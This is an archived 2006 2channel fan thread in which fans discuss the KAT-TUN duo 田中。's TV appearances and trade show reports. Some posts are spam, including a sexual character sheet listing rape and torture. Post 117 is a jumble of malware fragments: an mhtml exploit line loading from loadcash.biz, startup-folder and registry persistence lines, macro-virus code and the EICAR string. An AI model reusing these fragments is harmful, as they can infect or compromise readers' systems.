5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

田中。3

1 :(♯・A・)人(冫、 ):2006/07/31(月) 01:08:34 ID:VnWCU975
こちらは田中。担がマターリ萌えを語るスレです

      お約束
        \ ダ――ッ! /
         ∧_,,∧  ∧_∧
        (#・A・)(冫、 )
        と'   O O  "つ
◎━━━━━━━━━━━━━━━━━━◎
┃基本はマターリ                   ┃
┃厨クサ同人クサな妄想(゚听)イラネ         ┃
┃他コンビとの比較禁止.              ┃
┃他スレへの妄想持ち出し禁止         ┃
┃深山歓迎だが半年ロムって空気を読んでくれ┃
◎━━━━━━━━━━━━━━━━━━◎

前スレ【田中。2】
http://tv7.2ch.net/test/read.cgi/jr2/1143223313/

前々スレ【田中。】
http://tv7.2ch.net/test/read.cgi/jr2/1117551229/

2 :ユー&名無しネ:2006/07/31(月) 01:37:47 ID:cQxYjtpz
>1
乙!

蟻でもヨロシク

3 :ユー&名無しネ:2006/07/31(月) 06:38:09 ID:gBHkUlLH
>1
乙彼サマー

蟻でもヨロ(・∀・)ノシ

4 :ローカルルール議論中@ユーは自治スレへ:2006/07/31(月) 19:44:27 ID:7Tj8m8UI
        ,, -───- 、
      ,,r'";;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::`ヽ、
     /''''''''          ヾ;;;;;ヽ  俺の金蔓共ごくろう!!
    i             |;;;;;;;;;;;|
    |,,''"゙`ゝ,,,,r 、,,,,r'"""‐ |;;;;;;;;;;.!
     i (●),ン < 、(●)(;;; ;);;;;;;;;| 
     iヽ  ,,ノ(、_, )ヽ、(;;; ⌒;)ミ ^゙`ヽ
     { |.  _,.ィェエヲ (;; ⌒;;;;;)|'-'~ ノ
    \   ``\\(;;  ;;;;) _|-'^"
       ''ー --  ○彡;;;;;;) ̄    


5 :ユー&名無しネ:2006/08/01(火) 00:18:26 ID:9fiFG+wK
前スレ>464GJ!
蟻でも引き続きマターリいこう

6 :ユー&名無しネ:2006/08/01(火) 01:49:35 ID:hw0MZes7
>5
カツン担らしくもうちょとギリギリにレスしたかったんだが焦った(w

前スレ>461姐さんのイマキヨさんが気になる木

7 :ユー&名無しネ:2006/08/02(水) 19:01:43 ID:vIq3O9sU
>1
乙ですん(*´∀`)つ旦~

8 :ユー&名無しネ:2006/08/03(木) 01:06:58 ID:MW/Bmw10
ピスタチオ(#・A・)人(冫、 )ホシュデスシー

9 :ユー&名無しネ:2006/08/04(金) 15:32:15 ID:kjPYbsqh
漫才見に行く田中。テラバロス

10 :ユー&名無しネ:2006/08/04(金) 17:29:26 ID:I9wBBBCU
http://rkg.jp/eh/8322/の新着か着うたってところにKAT-TUNとかジュニアの曲が
いっぱいのってるサイトがあったよ!!アルバム曲とかメドレーもあってかなりオススメ☆!私もメドレー曲とって着うた設定してます!



11 :ユー&名無しネ:2006/08/04(金) 18:44:56 ID:bKqVD6B3
8月13日(日)
ゲスト:タッキー&翼<New Single「Ho!サマー」>
★KAT-TUN(聖&中丸メドレー)
★60ミニッツ(野球編)

12 :ユー&名無しネ:2006/08/04(金) 20:00:01 ID:uAQqjBw7
        ,, -───- 、
      ,,r'";;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::`ヽ、
     /''''''''          ヾ;;;;;ヽ  俺の金蔓共ごくろう!!
    i             |;;;;;;;;;;;|
    |,,''"゙`ゝ,,,,r 、,,,,r'"""‐ |;;;;;;;;;;.!
     i (●),ン < 、(●)(;;; ;);;;;;;;;| 
     iヽ  ,,ノ(、_, )ヽ、(;;; ⌒;)ミ ^゙`ヽ
     { |.  _,.ィェエヲ (;; ⌒;;;;;)|'-'~ ノ
    \   ``\\(;;  ;;;;) _|-'^"
       ''ー --  ○彡;;;;;;) ̄  

13 :ユー&名無しネ:2006/08/04(金) 20:26:37 ID:E+TJuW78
>9
kwsk

14 :ユー&名無しネ:2006/08/04(金) 20:59:58 ID:5WFT9ffA
>11
久しぶりにキタ Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒(。A。)!!!
なに歌うのか楽しみすぎる

15 :ユー&名無しネ:2006/08/04(金) 21:01:30 ID:SAITBVP1
【名前】羽場狩静香
【職業】羽場狩組二代目組長
【性別・年齢】26歳♀
【身長・体重】168cm・?kg
【3S】93・61・86
【外見・容姿】妖艶で端整な顔立ち・腰まで伸ばされた黒髪を
       アップ・スタイルに纏めている・しっとりとし
       た白い肌…
【衣裳・装身具】黒レザーのボンテージ着物・錦蛇の皮帯・真
        紅の長襦袢・純白の下帯…
【性格】男勝りの鉄火肌だが、実は潜在的ドMで狂うとスゴイ
    って感じ…
【嗜好】強姦・SM・拷問・汚物・恥辱・肉体&精神改造・猟
    奇・調教・隷属…
【NG】火傷・切断・大量流血…
【備考】抗争相手の暴力団組織が放った刺客に惨殺された夫の
    跡目を継いで…

16 :ユー&名無しネ:2006/08/04(金) 21:33:31 ID:3HZL+rd5
>13
蜂祭で爺が言ってたラスィ

17 :ユー&名無しネ:2006/08/05(土) 13:16:26 ID:fJBuszBv
蜂祭いけない自分負け組orz
詳細知ってる姐さんレポヨロ

18 :ユー&名無しネ:2006/08/07(月) 07:57:28 ID:u38vNC+a
ノシ
週末で良ければレポ落とすよ

今更シオドメディア見たんだが本当にネ申番組だた
オム爺メドレー禿禿タノスィミだ

19 :ユー&名無しネ:2006/08/07(月) 09:28:14 ID:TcqGstVF
>17
末っ子にサッカーに誘われてたけどちょうどオムと漫才見に行く約束してて
参加出来なかったらそれ以降声がかからないって話だった
あらちとスタッフでJストチーム作ったから爺が入れてくださいって言ったら
歪にでも漫才見にいっちゃうんでしょ?って言われててワロタ

20 :ユー&名無しネ:2006/08/07(月) 21:02:48 ID:WjHNEMmT
爺もマイボス見てるんだな(*´∀`)
ほめられて良かったなオム

21 :ユー&名無しネ:2006/08/07(月) 23:13:23 ID:ClKWzQvs
>20
スマソ
それは何の発言?

22 :ユー&名無しネ:2006/08/08(火) 00:06:40 ID:wzrMnvtL
>21
7日のデイリーのオムインタ

23 :ユー&名無しネ:2006/08/08(火) 02:11:54 ID:qME7Lk4r
>19
dd!歪テラワロス
誰の漫才見に行ったのか気になる木

24 :ユー&名無しネ:2006/08/14(月) 15:50:28 ID:qZtqz8Vt
ようやく歌藁見れた(*´∀`)
ダンサー邪魔だったけどオム爺カコヨス
信号前に2人でポーズ決めるとこ萌え
でも野球は2人ともダメダメだな(w


25 :ユー&名無しネ:2006/08/14(月) 20:18:49 ID:WOWG8X41
まわりすぎだった(w

26 :ユー&名無しネ:2006/08/23(水) 18:58:58 ID:i/8mQbn4
あまりの田中。不足に原宿駅の音符ポスターがオム爺背中合わせに
なってるだけで嬉しくなってしまった(w
ついでに歩誌の秋の味覚といえばで他面はマツタケとかなのに
揃ってサンマをあげる庶民派田中。にワロス
本当に食べ物の趣味似てるんだな

27 :ユー&名無しネ:2006/08/23(水) 21:56:14 ID:aDZP5CJx
>26
歩誌、魚のアンケも2人ともフグで同じなんだよな(w

28 :ユー&名無しネ:2006/08/23(水) 22:01:36 ID:Gf1fmZ/7
食の趣味が合うで少蔵お手紙の「彼と同じものを…」思い出した(w

自分も田中。不足だたけど
昨日のカツスタのオムの犬発言にほっこりしたよ

29 :ユー&名無しネ:2006/08/23(水) 22:09:27 ID:W/DGpYXZ
>28
カツスタ聞けない自分にkwskおながい(*´∀`)ノシ

30 :ユー&名無しネ:2006/08/23(水) 22:16:42 ID:Gf1fmZ/7
>29
カツスタが昨日で101回目の放送でそれをうけてオムが
(#・A・)きたよワンオンワンきたよー
と言ってた

些細杉てスマソ(w

31 :ユー&名無しネ:2006/08/23(水) 22:20:20 ID:W/DGpYXZ
>30
d
禿些細だな(w
でも犬は田中。担には名曲だからウレスィな(*´∀`)

32 :ユー&名無しネ:2006/08/27(日) 09:38:26 ID:4cKIeJs7
age

33 :ユー&名無しネ:2006/08/27(日) 21:49:54 ID:TW+YCICJ
ダンス甲子園で久しぶりに河童が見れたな(w

34 :ユー&名無しネ:2006/08/28(月) 08:28:57 ID:gOcRSDRQ
>33
棚(w
なかなか同じ会場に田中。が揃わなくてセツナスだた
オムも爺も乙!

35 :ユー&名無しネ:2006/08/28(月) 22:28:19 ID:ttZVHGXC
OAは小窓だし映って茄子だがサライで爺がオムの肩に手を乗せて歌ってる時に
オムの腕は爺の腰にきてたのハケーンしてテラ感動した(´∀`*)

36 :ユー&名無しネ:2006/08/29(火) 01:31:10 ID:Ok5wOIhA
>35
観覧行った姐さん?
サライの時は隣というか前後?だたな(w

37 :ユー&名無しネ:2006/08/29(火) 21:09:29 ID:mq/9Z/P7
http://up2.viploader.net/pic/src/viploader282152.jpg

38 :ユー&名無しネ:2006/09/04(月) 21:56:47 ID:osemzz6y
爺さんハピバ
オムにどんな風に祝ってもらったかきちんと報告ヨロ

39 :ユー&名無しネ:2006/09/12(火) 23:15:29 ID:qydLYH+l
誕プレゲーム機本体だけって絶対わざとだよな(w
今度一緒にコントローラーとソフト買いに行けばいいよ

40 :ユー&名無しネ:2006/09/13(水) 01:26:49 ID:X4hUhjDS
>39
同じことオモタ(w
コントローラーついてないゲーム機なんてあるん棚

41 :ユー&名無しネ:2006/09/13(水) 01:58:15 ID:yQEFDdNJ
新番組に田中。のコントコーナーがありますように
1分とか30秒のミニコーナーでもかまいません
どんなに寒くても耐えてみせます
日テロ様どうかヨロです(-人-)ナモナモ

42 :ユー&名無しネ:2006/09/13(水) 13:48:53 ID:rAp0o8DB
田中。で新番組と噂されていたのはこの事だったのか?
とりあえずナモナモしとく

43 :ユー&名無しネ:2006/09/13(水) 15:44:46 ID:3HqyLOdw
田中。見れますように(-人-)ナモナモ
人生に潤いが必要なんです。

44 :ユー&名無しネ:2006/09/13(水) 16:47:08 ID:CUhh2Cm7
ちょマジで田中。メインパーソナリティーなのか・゚・(ノ∀`)・゚・

45 :ユー&名無しネ:2006/09/14(木) 01:50:17 ID:9HrUOVEe
>44
まだ確定じゃないから公式ソースが出るまで喜ぶのは待とう
でもできればカツン6人揃って出演するといいな
その中で田中。が司会担当させてもらえるなら嬉すぃ

46 :ユー&名無しネ:2006/09/15(金) 11:55:49 ID:Ud7jUJuv
ズーミンで朝からヨガする田中。に癒された
ダンスも小村禿簿で参加するのかな(*´∀`)
久しぶりに歌藁wktk

47 :ユー&名無しネ:2006/09/15(金) 18:46:51 ID:+UbXgmjh
ズーミン忘れてた自分…orz
しかも当日も旅行で山奥だからきっと見られない
放送後の姐さん達の感想楽しみにしてますん(*´∀`)
>45
自分もそれがベストだな(-人-)ナモナモ

48 :ユー&名無しネ:2006/09/17(日) 21:09:34 ID:4awRnojm
>47姐さんじゃないが台風でバイト先から帰れない…
もしよければ田中。レポおながいします

49 :ユー&名無しネ:2006/09/17(日) 23:03:02 ID:/OJGs4ir
>48
姐さん大丈夫?
雨風おさまってから気をつけて帰ってこいよ

ロケはお互いの小ボケにいちいち突っ込む田中。に(*´∀`)
ヨーガの衣装二人とも似合っててキャワスモエス
一緒にヨーガしてるだけで全然サポートになってないけどな(w
そのことを真琴姐さんに突っ込まれるが田中。バロスだた

正直あんまり期待しすぎるとガカーリするかも新米
でも次回も田中。ロケみたいだし懲りずにwktk!

50 :ユー&名無しネ:2006/09/18(月) 00:17:56 ID:3ksFgL49
>49
レポdです!
なんとか帰れた!停電心配だたが無事ウタワラ録画出来てたよ
ひさびさにオムのボケにツッコム爺の図が見れてウレシス
姐さんの助言通り期待せずに見たんだが大満足だ(w

51 :ユー&名無しネ:2006/09/18(月) 00:32:52 ID:KIaTGNuf
>50
姐さんもレコも無事で良かったノシ

お宅訪問する前にマンソンの廊下でオムが爺の頭叩いてるけど
どんなボケとツッコミだったのか気になる木
そういや予告でもオムが爺の頭叩いて棚(w

52 :ユー&名無しネ:2006/09/18(月) 13:13:34 ID:zIqpAqjU
放置に確定ktkr
これで毎週田中。+。:.゜ヽ(*´∀`)ノ゜.:。+゜

自分もコント見タス(-人-)ナモナモ
でも毎週ネタ続くかな(w

53 :ユー&名無しネ:2006/09/18(月) 13:54:03 ID:zVORxlLf
キタ━━━ヽ(∀゚ )人(゚∀゚)人( ゚∀)人(∀゚ )人(゚∀゚)人( ゚∀)ノ━━━ !!!
田中。初司会オメ!
姐さんたち今日は祭りだな

54 :ユー&名無しネ:2006/09/18(月) 18:01:55 ID:3ksFgL49
毎週コントオソロシスだが見てみたい田中。担の性(w
放置買いに行ってくる(*´∀`)

55 :ユー&名無しネ:2006/09/18(月) 23:57:12 ID:Fx/vMg7R
田中。キタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!
毎週見れるなんてテラウレシス

56 :ユー&名無しネ:2006/09/19(火) 21:34:44 ID:FzaJT1j0
今更だが田中。司会キタ*・゜゚・*:.。..。.:*・゜(゚∀゚)゚・*:.。. .。.:*・゜゚・*!!!!!
しかもウタワラも田中。続きでテラウレシス
放置買い損ねたんだが写真とかあった?

57 :ユー&名無しネ:2006/09/19(火) 23:56:22 ID:+Z0X6uwq
>56
名前の部分にちっちゃく写真ついてただけだたよ
手に入れなくても無問題なくらいの記事だが
田中。の名前が並んでることに感動買いした(w

58 :ユー&名無しネ:2006/09/20(水) 16:11:28 ID:k8SYuK9N
>57
d
司会ケテーイ自体も遅れて知ったから
なんか乗り遅れた感じだ(w
田中。が司会だなんて全然予想外で未だに信じられナス

59 :ユー&名無しネ:2006/09/27(水) 19:09:59 ID:wrUo8bxc
歌藁番宣の田中。キャワだったな(*´∀`)
お互いに落書きする田中。が楽しそうでモエス

60 :ユー&名無しネ:2006/09/27(水) 23:26:29 ID:ZUKYN4Vq
番宣見れない痴呆の自分に少しだけレポをくれないだろうかorz

61 :ユー&名無しネ:2006/09/28(木) 00:46:57 ID:Ryk1wm0J
前回のヨーガ未公開がちょっとあり
バランス感覚なくて変顔でグラグラするオムにワロス

収録後トーク
(冫、 )「長女が6歳の子でね、可愛らしかったね」
(#・A・)「ホント可愛らしかったね。800歳ですからね」
(冫、 )「それヨガの先生(w」
松嶋タンに「子供は好きなの?」って聞かれて
(冫、 )「大好きですねぇ」
その言い方が禿嘘臭くてオムも椅子から立ち上がってワロテた

次回予告
またもや登場する偽オム(誰かは当日まで秘密)
サポートは海をイメージしたステージをつくるためブ゙ルーシートにペインティング
作業の息抜きにオムは爺のつなぎに中肉中背って落書き
爺はオムの顔に落書きして大爆笑(w

長文ゴミつきスマソ
悪ノリする田中。が見れそうで楽しみ(*´∀`)

62 :ユー&名無しネ:2006/09/28(木) 07:57:08 ID:8OtRzdn0
レポ姐さんdd!
次回が禿禿タノスィミだ

63 :ユー&名無しネ:2006/09/29(金) 16:16:46 ID:NyLUV9Y8
今日って夕立の収録日だよな
番協姐さんはいないかな?

64 :ユー&名無しネ:2006/10/01(日) 11:01:34 ID:PKl0hmom
予告やるかな?(*´∀`)

65 :ユー&名無しネ:2006/10/01(日) 12:38:33 ID:92sQrd75
自分も期待してTVつけてたけど予告やらなかったよな?
てか本当に来週から番組はじまるのか?(w

とりあえず今夜の歌藁wktk!(*´∀`)

66 :ユー&名無しネ:2006/10/01(日) 12:54:35 ID:PKl0hmom
やらなかったな…orz
まさか壮大な釣りってことナイヨナ(-人-;)

67 :ユー&名無しネ:2006/10/01(日) 21:00:48 ID:jmStGZzI
歌藁マンセーだったな
オムの顔に落書きしてる時誰より楽しそうな爺(*´∀`)
ジャレ合うってナレがピターリだ

68 :ユー&名無しネ:2006/10/01(日) 22:48:49 ID:+vrj0g21
>67
自分もそれ思った!
じゃれ合うって表現が田中。に似合いすぎて(*´∀`)
ワープの抱っこもアフォでバロス(w
田中。は二人とも絵上手いし今回のサポはGJだたな
ただ中肉中背カットだけが残念だ


69 :ユー&名無しネ:2006/10/02(月) 11:09:35 ID:xe4AIyCF
めざまし一瞬だけど田中。映ったな(w
ズーミンはスルーだったけどorz

70 :ユー&名無しネ:2006/10/02(月) 12:39:29 ID:jytP2yyx
Σ(゜д゜)
日テレしか録ってネー_| ̄|○

71 :ユー&名無しネ:2006/10/03(火) 23:47:58 ID:LlGrQf0Q
たまには

72 :ユー&名無しネ:2006/10/04(水) 00:14:41 ID:iiEgzRAn
ちょ探した…!sagehageで逝こうぜ姐さん…!

73 :ユー&名無しネ:2006/10/04(水) 02:01:48 ID:WHcOrk4k
ttp://www.ntv.co.jp/you/
ようやく公式HPのようなものが出来たな
トークバラエティwktk!

74 :ユー&名無しネ:2006/10/04(水) 18:46:59 ID:cl2gnQ41
田中。の名前が最初に書いてあるなんてスゴスすぎてドチドチする
まだ夢のような気分だ
女性MCは月ごとに変わるのは勿体ナスだな
中島タソなら上手く仕切ってくれるだろうに

75 :ユー&名無しネ:2006/10/05(木) 23:57:48 ID:pc9DMr4E
週末に向けてカウントダウンwktk

76 :ユー&名無しネ:2006/10/07(土) 15:01:38 ID:HX0zDB/5
結局なんの番宣もないまま初回を迎えそうだな
トークバラエティって鴇のメントレみたいなの想像してたのに
生熱湯風呂とかダチョウ倶楽部とかワケワカメ
とりあえずダチョウの前で田中。のダーッ!が見たい(w

77 :ユー&名無しネ:2006/10/07(土) 15:35:24 ID:kS6QuDqW
>76
なんか嫌な悪寒が(ノД`)
出演者が多すぎると田中。も映りにくくなりそうでイヤソ
色んな芸能人と触れ合って揉まれて成長してホスィけど
なんか方向性が曖昧で心配

78 :ユー&名無しネ:2006/10/07(土) 22:04:36 ID:zFrAFm0Z
出演者多いと編集マンドイよな(w
とりあえず明日は純粋に楽しみにしておこうジャマイカ(*´∀`)

終わったら急いで番協当落の確認に行かなくちゃいけないんだが
今回も枠小さいのかな…orz

79 :ユー&名無しネ:2006/10/07(土) 23:07:35 ID:yOTAxgjr
先週のジョンにはメイソはゲスト2組とトーク
他には一芸自慢のイパーンが出て一芸に田中。が挑戦も蟻
ってあったからずっと出てるとオモー

80 :ユー&名無しネ:2006/10/08(日) 08:50:55 ID:lNRcVCPt
あと3時間で夕立放送wktk
熱湯風呂でオーバーリアクションする田中。が見れるかな?
渋谷十番勝負でオムに熱いおしぼり当てられて
奇声発する爺みたいなのを期待してる(*´∀`)

81 :ユー&名無しネ:2006/10/08(日) 13:29:20 ID:GMnKRc1X
姐さんたち…生きてる?
想像以上にgdgdな番組だったな_| ̄|○
YOUバックゲームの田中。はちょとキャワだったけど
あとオムの頭に熱湯かけるのは爺にやってもらいたかった

82 :ユー&名無しネ:2006/10/08(日) 21:36:55 ID:EzGxZSjR
生きてるノシ

確かにgdgdだったが想像していたモノ自体が
アレよりはるかにgdgdだったせいか全然許容範囲だった
多少なりとも今後に期待できるとオモー…のは持ち上げ杉か…

83 :ユー&名無しネ:2006/10/08(日) 23:41:39 ID:s132x7T/
(・∀・)ノシ
最初gdgdで心配だったけど2人揃って次課長に突っ込んだりするのが見れてテラ和んだ(*´∀`)
次課長との相性もよさげだしこれからに期待するよノシ

84 :ユー&名無しネ:2006/10/09(月) 02:34:09 ID:aUSQdU55
リアルタイムで見た時はぐだぐだ感に焦ったけど
リピりまくってたらモエ過ぎて死にそうになった(w
これはじわじわくるよ(*´∀`)

85 :ユー&名無しネ:2006/10/09(月) 19:03:57 ID:j2oJhDd/
自分も予想してたのがもっと初期のウタ○ラぽいのだたから
それより全然ヨカタよ
むしろ田中。キャワだしズニアに囲まれてお兄さんでふいんき(ryよくて
日曜日に和める番組ができたよ(*´∀`)

86 :ユー&名無しネ:2006/10/10(火) 00:15:27 ID:FfBZyr3w
姐さんたち芋誌見た?
後ろのほうのページの小さい写真の田中。モエス(*´∀`)
「田中。」表記もウレスィ
田中。はああいう小さいオフショが本当にキャワだな(w

87 :ユー&名無しネ:2006/10/10(火) 14:27:02 ID:vYDbRhtU
昨日番協行ってきた(*´∀`)ノシ
収録時間長くてテラウマーだったが
田中。担的にウマーだったとこだけでもレポ落とすね
レポ初めてなのでおかしなとこあったらスマソ

爺は何事もなかったかのようにスルーだたが
他の出演者がトークしてる時に、オムが爺の肩に突然の頭突きした(w

あとYOUバックゲームでオムが失敗して罰ゲームで芝ドリンクを飲んだんだが
その後ずっと具合悪そうに腹をさすったりしてて
爺の肩に頭をコテンと乗せたよ(゚∀゚)!!
またしても爺は迷惑そうにスッと横にズレてオムの頭を落としたが(w

88 :ユー&名無しネ:2006/10/10(火) 16:05:15 ID:gshQsg2f
>78姐さん?
番協当選オメ&レポd!
今度は罰ゲームもあるんだな
芝ドリンクって想像つかないけど禿不味そうだ
体を張るオムに冷たい爺モエス(w

89 :ユー&名無しネ:2006/10/10(火) 18:15:46 ID:r8bRadcE
番協姐さんd!
出来れば二人のビズを教えて頂けないだろうか
特に爺の髪とオムのヒ(ry

90 :ユー&名無しネ:2006/10/10(火) 19:10:17 ID:J5UgB9Qo
>87
レポキタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* !!!!!
オム何がしたんだオム(w
田中。の些細なやり取りがキャワでイイな
放送が禿楽しみだ(*´∀`)wktk

91 :ユー&名無しネ:2006/10/10(火) 22:03:33 ID:KFpzDS8W
78=87ですん

オムの髭はチレイだたよ(*´∀`)
爺の髪型は…スマソ形容の仕方が若欄が普通(w
ただセットチェンジの度にメイクサンが駆け寄って汗を拭いたり扇いでた
カツスタでもでんでんが話題にしてたけど、爺は本当に暑がりなん棚(w
オムもあちーと言ってジャケットを半脱ぎになって
タンクから覗く背中と肩がテラセクスィーだた

芝ドリンクを飲んだオムは芝食べる方がマシだと言ってたよ(w
オムには悪いがヲエーって言い続けててバロス

オムはタワシで背中をこすられ、爺は鼻からウドン吸い込んでた
とりあえず凄かった(w
河本飯店のシーンでヒントを貰う為に爺は物真似も2種披露
かなり無理矢理できすぎ君とユリアをやらされていた(w

長文スマソ

92 :ユー&名無しネ:2006/10/10(火) 22:16:47 ID:siQ0xbRW
姐さんレポd
収録時間は何時から始まってどのくらいだったのか脳?

93 :ユー&名無しネ:2006/10/10(火) 22:32:41 ID:J5UgB9Qo
>91
姐さん引き続きレポd
芝ドリンクどんな味なんだ(((( ;゚Д゚)))

ヲエーなオムが想像しやすくてワロス(w
あのデカイ鼻からうどんを食う爺もテラ見たい
なんかスゴスなのは伝わったよ
どこまで放送されるのかな

できすぎ君は分かるがユリアって誰だよ(w

94 :ユー&名無しネ:2006/10/10(火) 23:05:07 ID:keoE/oGl
レポd(´∀`*)
なんかテラ楽しそうで今からwktk
タワシもうどんも罰ゲームなんだよな
鼻からうどんてテラ痛いよ(w

95 :ユー&名無しネ:2006/10/11(水) 00:24:35 ID:nZ7qUnDB
番協姐さんレポdです
爺肩くらい貸したれよ!(w
そして罰ゲームが(((( ;゚Д゚)))



96 :ユー&名無しネ:2006/10/11(水) 00:27:00 ID:TvgT6Jdw
>91
レポdd!
ユリアは北斗の拳だよな?
なんだかバラの醍醐味やらせてもらってるジャマイカ田中。(w
週末がタノスィミだよ(*´∀`)

97 :ユー&名無しネ:2006/10/11(水) 02:17:57 ID:kPIkTSBs
レポたくさんキテタ━━━ヽ(゚∀゚ *)ノ━━━!!!!

姐さん乙でした!
夕立って意外と過激な番組なんだな(w
日曜がwktkすぎる

98 :ユー&名無しネ:2006/10/11(水) 08:01:14 ID:I/yjeXM4
タワシとうどんは仰天人間に挑戦なんじゃまいか?
あの公平じゃないルーレットで田中。が挑戦させられるとみた
なんかカツンのオム爺ってより芸人田中。の仕事棚(w

99 :ユー&名無しネ:2006/10/13(金) 13:37:45 ID:ch+EHopk
番協は何人ぐらい当選したの?

100 :ユー&名無しネ:2006/10/15(日) 11:09:01 ID:OY6YAbi8



101 :ユー&名無しネ:2006/10/15(日) 11:11:12 ID:OY6YAbi8



102 :ユー&名無しネ:2006/10/15(日) 13:44:05 ID:m4g9+Pky
夕立先週よりテンポよくなった気がした!
うどんに挑戦した爺本気で乙
芝ジュース飲んで涙目のオムモエス
爺に寄りかかるオムをカットしたスタッフはウマシカ(#´∀`)
爺のモノマネは明らかにユリアじゃなくてリンだたな(w
ユニは大変な時期だけど楽しそうな田中。に救われたよ

103 :ユー&名無しネ:2006/10/15(日) 14:48:59 ID:MciahZIq
先週よりヨカタな
うどん芸に笑い転げてる田中。に癒されたよ(*´∀`)
タワシもうどんも芝ジュースも体張ってがんがってる
田中。本当に乙!

104 :ユー&名無しネ:2006/10/15(日) 19:20:10 ID:ulyfiXzv
夕立たこやきではいつ見れるのか脳(´・ω・)

105 :ユー&名無しネ:2006/10/15(日) 21:47:32 ID:1reERbRC
>>104
自分もたこやきだよノシ
読売はこのままヌルーぽい
もうだめぽ_| ̄|○

106 :ユー&名無しネ:2006/10/16(月) 17:06:45 ID:FyqJN2Ft
15日のユーたち見逃した_| ̄|○ _| ̄|○ _| ̄|○

まじアリエナス
逝って来る

107 :ユー&名無しネ:2006/10/16(月) 19:38:18 ID:NJX5K3Uz
>106
丼舞

カツン担は大変だたから仕方ナス

108 :ユー&名無しネ:2006/10/18(水) 01:02:25 ID:esxlamht
個人スレロムってきたら夕立レポ落ちてた
田中。ネタ披露って地上波では初だよな(((( ;゚Д゚)))
でも楽しみ(w
カットされないといいな

109 :ユー&名無しネ:2006/10/18(水) 12:45:22 ID:07d6vkRw
ネタwktk((((;´Д`*)))
テレガイにユー達載ってるけどたこやきでも載ってる?
たこやき姐さん達が不憫杉るorz

110 :ユー&名無しネ:2006/10/18(水) 23:41:00 ID:bt+otIoK
ワクブルktkr

111 :ユー&名無しネ:2006/10/19(木) 19:12:42 ID:wk4uQ62f
テレガイ見た(*´∀`)ノシ
たこやきでも載ってたよ
うどん鼻に入れる爺にワロタ(w

112 :ユー&名無しネ:2006/10/19(木) 23:25:08 ID:mcjWDJSq
27日のオリスタに田中。インタkrkr(´∀`*)

113 :ユー&名無しネ:2006/10/20(金) 17:07:01 ID:KO7rpXic
ガイドのオムはなんで唐突に爺を愛してないとか言い出したんだ?(w
写真も爺は和み系なのにオムは強面だらけでワロス

オリスタも夕立関連のインタかな?
週一で田中。が見れるなんてホント幸せ棚

114 :ユー&名無しネ:2006/10/20(金) 18:42:46 ID:rRlZLabX
>113
今更ながら
番組があるって事はTV誌にも取り上げられてウマーって事に気づいた(w
忙しくてチェキできてないけどorz

115 :ユー&名無しネ:2006/10/21(土) 01:13:58 ID:paJGEHmY
初回・視聴率

1位「Dr.コトー診療所2006」 23.2%
2位「14才の母〜愛するために生まれてきた 」19.7%
3位「僕の歩く道 」19.3%
4位「セーラー服と機関銃 」17.3%
5位「たったひとつの恋 」12.3%
6位「鉄板少女アカネ!! 」 11%
7位「だめんず・うぉ〜か〜。 」10.3%
8位「嫌われ松子の一生 」8.8%

月9で12lはヤヴァすぎて笑えないけど、
初回土9で12lはもっと笑えない。
しかもジャニーズなのに。

116 :ユー&名無しネ:2006/10/21(土) 01:27:56 ID:AMWi16JW
だなぁ土9枠は20%越えることも可能な枠だしな
低いな・・・

117 :<body onload=window()>:2006/10/21(土) 02:17:45 ID:dm0ROmfQ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

118 :ユー&名無しネ:2006/10/21(土) 11:12:00 ID:k7Fj4sl6
   +
+  ∧_∧ +
 +(0゚・∀・) あと24時間
  (0゚つと) +
+ と_)_)


119 :ユー&名無しネ:2006/10/21(土) 20:01:58 ID:rMLbCVwg
>118
早!(w
ガイドの愛してる話はオンエアに載るんだろうか
唐突だけどカ○゙エエよな(*´∀`)

120 :ユー&名無しネ:2006/10/22(日) 14:24:00 ID:xBtqB1h+
なんかまたテンポ悪くなった?
オムのローテンションも気になる

121 :ユー&名無しネ:2006/10/22(日) 17:29:44 ID:7kqtx7BF
           λ    λ
          / ヽ、_/ ヽ
         /          \
.   ,rヘ(`t  |   O    O  | fヽ/λ
   (ゝ`て ゝ|二    t_入_)   |ノ )  ク
   `ヽ     ゝ、 ______ /     /

  おぢちゃん、いままで遊んでくれてありがとう
  さよならできなくてごめんね。

  お礼にボクがおこずかいで買ってきたチョコレートを
  おいておきます。食べてね
  それじゃぁさみしいけれど バイバイ。



122 :ユー&名無しネ:2006/10/22(日) 19:20:19 ID:jqWVKYN3
>120
自分は今日楽しかったよ
梅チャソに豆ぶつけられそうになってビビる田中。キャワ(*´∀`)
オムはお疲れかもしれんが自分に振られたときはガンガッてるし
子猫以外のズニアも初回より背景じゃなくなってたし

それより女性MCが来週から変わるのが不安だ
出演者の名前も覚えきらないまま交代ってビミョンじゃね?

123 :ユー&名無しネ:2006/10/22(日) 20:43:31 ID:1JSZxxg5
>122
やっと馴染み始めた頃にMC交代はビミョンだよな

